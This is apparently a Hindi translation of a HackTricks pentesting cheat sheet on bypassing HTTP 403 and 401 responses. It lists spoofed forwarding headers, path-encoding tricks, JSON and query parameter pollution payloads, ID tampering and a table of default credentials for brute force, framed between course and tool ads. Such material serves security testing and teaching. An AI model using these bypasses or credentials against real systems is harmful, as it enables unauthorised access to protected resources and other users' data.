403 & 401 Bypasses

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

सुरक्षा आकलन और पेनेट्रेशन टेस्टिंग के लिए तुरंत उपलब्ध सेटअप। कहीं से भी 20+ टूल और सुविधाओं के साथ पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं देते हैं - हम उन्हें वापस कुछ समय देने के लिए कस्टम टूल, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोजें, शैल्स पॉप करें और मजा करें।

HTTP Verbs/Methods Fuzzing

फ़ाइल तक पहुंचने के लिए विभिन्न verbs का उपयोग करने की कोशिश करें: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • प्रतिक्रिया हेडर्स की जाँच करें, शायद कुछ जानकारी दी जा सकती है। उदाहरण के लिए, HEAD के लिए 200 प्रतिक्रिया में Content-Length: 55 का मतलब है कि HEAD verb सूचना तक पहुंच सकता है। लेकिन फिर भी आपको उस सूचना को बाहर निकालने का एक तरीका ढूंढना होगा।

  • X-HTTP-Method-Override: PUT जैसा HTTP हेडर उपयोग करने से उपयोग किए गए verb को अधिलेखित किया जा सकता है।

  • TRACE verb का उपयोग करें और यदि आप बहुत भाग्यशाली हैं तो शायद प्रतिक्रिया में आपको इंटरमीडिएट प्रॉक्सी द्वारा जोड़े गए हेडर्स भी दिख सकते हैं जो उपयोगी हो सकते हैं।

HTTP Headers Fuzzing

  • Host हेडर को किसी अर्बिट्रेरी मान पर बदलें (जो यहाँ काम करता था)

  • संसाधन तक पहुंचने के लिए अन्य उपयोगकर्ता एजेंट का प्रयास करें।

  • Fuzz HTTP Headers: HTTP Proxy Headers, HTTP Authentication Basic और NTLM brute-force (कुछ कम्बिनेशन के साथ केवल) और अन्य तकनीकों का प्रयास करें। इस सब के लिए मैंने उपकरण fuzzhttpbypass बनाया है।

  • X-Originating-IP: 127.0.0.1

  • X-Forwarded-For: 127.0.0.1

  • X-Forwarded: 127.0.0.1

  • Forwarded-For: 127.0.0.1

  • X-Remote-IP: 127.0.0.1

  • X-Remote-Addr: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • X-Original-URL: 127.0.0.1

  • Client-IP: 127.0.0.1

  • True-Client-IP: 127.0.0.1

  • Cluster-Client-IP: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • Host: localhost

यदि पथ संरक्षित है तो आप इन अन्य हेडर्स का उपयोग करके पथ संरक्षण को बायपास करने का प्रयास कर सकते हैं:

  • X-Original-URL: /admin/console

  • X-Rewrite-URL: /admin/console

  • यदि पृष्ठ प्रॉक्सी के पीछे है, शायद यह प्रॉक्सी है जो आपको निजी जानकारी तक पहुंचने से रोक रहा है। HTTP Request Smuggling का दुरुपयोग करने का प्रयास करें या hop-by-hop headers** का दुरुपयोग करें।**

  • विभिन्न प्रतिक्रिया के लिए खोजने के लिए विशेष HTTP हेडर्स को फज़ करें।

  • HTTP Methods को फज़ करते समय विशेष HTTP हेडर्स को फज़ करें।

  • Host हेडर को हटाएं और शायद आप संरक्षण को बायपास कर सकें।

पथ फज़िंग

यदि /पथ ब्लॉक है:

  • /%2e/path _(यदि पहुंच को प्रॉक्सी द्वारा ब्लॉक किया गया है, तो यह संरक्षण को बायपास कर सकता है)। आजमाएं भी_** /%252e**/path (डबल URL एन्कोड)

  • यूनिकोड बायपास का प्रयास करें: /%ef%bc%8fpath (यूआरएल एन्कोडेड वर्ण "/") इसलिए जब वापस एन्कोड किया जाएगा तो यह //path हो जाएगा और शायद आपने पहले ही /पथ नाम की जाँच को बायपास कर लिया होगा।

  • अन्य पथ बायपास:

  • site.com/secret –> HTTP 403 Forbidden

  • site.com/SECRET –> HTTP 200 OK

  • site.com/secret/ –> HTTP 200 OK

  • site.com/secret/. –> HTTP 200 OK

  • site.com//secret// –> HTTP 200 OK

  • site.com/./secret/.. –> HTTP 200 OK

  • site.com/;/secret –> HTTP 200 OK

  • site.com/.;/secret –> HTTP 200 OK

  • site.com//;//secret –> HTTP 200 OK

  • site.com/secret.json –> HTTP 200 OK (ruby)

  • इस सूची का प्रयोग करें निम्नलिखित स्थितियों में:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ

  • अन्य API बायपास:

  • /v3/users_data/1234 --> 403 Forbidden

  • /v1/users_data/1234 --> 200 OK

  • {“id”:111} --> 401 Unauthriozied

  • {“id”:[111]} --> 200 OK

  • {“id”:111} --> 401 Unauthriozied

  • {“id”:{“id”:111}} --> 200 OK

  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)

  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

पैरामीटर मैनिपुलेशन

  • पैरामीटर मान बदलें: id=123 --> id=124

  • URL में अतिरिक्त पैरामीटर जोड़ें: ?id=124 —-> id=124&isAdmin=true

  • पैरामीटर हटाएं

  • पैरामीटरों को पुनः क्रमबद्ध करें

  • विशेष वर्ण उपयोग करें।

  • पैरामीटर में सीमा परीक्षण करें — -234 या 0 या 99999999 जैसे मान प्रदान करें (कुछ उदाहरण मान।)

प्रोटोकॉल संस्करण

यदि HTTP/1.1 का उपयोग किया जा रहा है तो 1.0 का उपयोग करने का प्रयास करें या यह भी जांचें कि क्या यह 2.0 का समर्थन करता है

अन्य बायपास

  • डोमेन का आईपी या सीनाम प्राप्त करें और उससे सीधे संपर्क करने का प्रयास करें

  • सर्वर को तनाव दें और सामान्य GET अनुरोध भेजें (यह व्यक्ति के लिए काम कर गया था फेसबुक पर)।

  • प्रोटोकॉल बदलें: http से https में, या https से http में

  • https://archive.org/web/ पर जाएं और जांचें कि क्या पिछले में उस फ़ाइल को विश्वस्तरीय रूप से पहुंचने में सफल रहा था

ब्रूट फ़ोर्स

  • पासवर्ड की अनुमानित प्रक्रिया: निम्नलिखित सामान्य क्रेडेंशियल का परीक्षण करें। क्या आप पीड़ित के बारे में कुछ जानते हैं? या CTF चैलेंज का नाम?

  • ब्रूट फ़ोर्स: मूल, डाइजेस्ट और NTLM प्रमाणीकरण का प्रयास करें।

सामान्य क्रेडेंशियल
admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

स्वचालित उपकरण

तत्काल उपलब्ध सेटअप विकल्प सुरक्षा मूल्यांकन और पेनेट्रेशन टेस्टिंग के लिए। कहीं से भी 20+ उपकरण और सुविधाओं के साथ एक पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं जाते - हम उन्हें वापस कुछ समय देने के लिए कस्टम उपकरण, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोज कर सकें, शैल्स पॉप कर सकें, और मज़ा कर सकें।

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated